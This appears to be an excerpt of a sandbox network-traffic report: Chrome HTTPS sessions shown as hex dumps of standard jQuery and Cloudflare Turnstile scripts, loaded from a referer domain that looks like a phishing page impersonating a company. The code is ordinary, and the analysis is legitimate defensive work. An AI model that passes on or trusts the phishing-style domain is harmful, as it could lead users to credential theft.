                                                                                                                                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                2024-10-28 16:47:56 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                2024-10-28 16:47:56 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                2024-10-28 16:47:56 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                35192.168.2.1649765104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:57 UTC579OUTGET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Referer: https://vokbz-iamgold.mobile-pdfqronline.com/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:57 UTC471INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:57 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 47672
                                                                                                                                                Connection: close
                                                                                                                                                accept-ranges: bytes
                                                                                                                                                last-modified: Wed, 23 Oct 2024 21:21:17 GMT
                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c69205adb28bd-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:57 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                                2024-10-28 16:47:57 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                2024-10-28 16:47:57 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                                                2024-10-28 16:47:57 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                                                                                                2024-10-28 16:47:57 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                                                Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                                                2024-10-28 16:47:57 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                                                                                Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                                                                                                2024-10-28 16:47:57 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                                                                                Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                                                                                                2024-10-28 16:47:57 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                                                                                                Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                                                                                                2024-10-28 16:47:57 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                                                                                                Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                                                                                                2024-10-28 16:47:57 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                                                                                                Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                36192.168.2.1649766151.101.66.1374436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:58 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                Host: code.jquery.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:58 UTC610INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 89501
                                                                                                                                                Server: nginx
                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                ETag: "28feccc0-15d9d"
                                                                                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:58 GMT
                                                                                                                                                Age: 1150940
                                                                                                                                                X-Served-By: cache-lga21931-LGA, cache-dfw-kdal2120119-DFW
                                                                                                                                                X-Cache: HIT, HIT
                                                                                                                                                X-Cache-Hits: 2, 2
                                                                                                                                                X-Timer: S1730134078.222627,VS0,VE0
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                2024-10-28 16:47:58 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                2024-10-28 16:47:58 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                2024-10-28 16:47:58 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
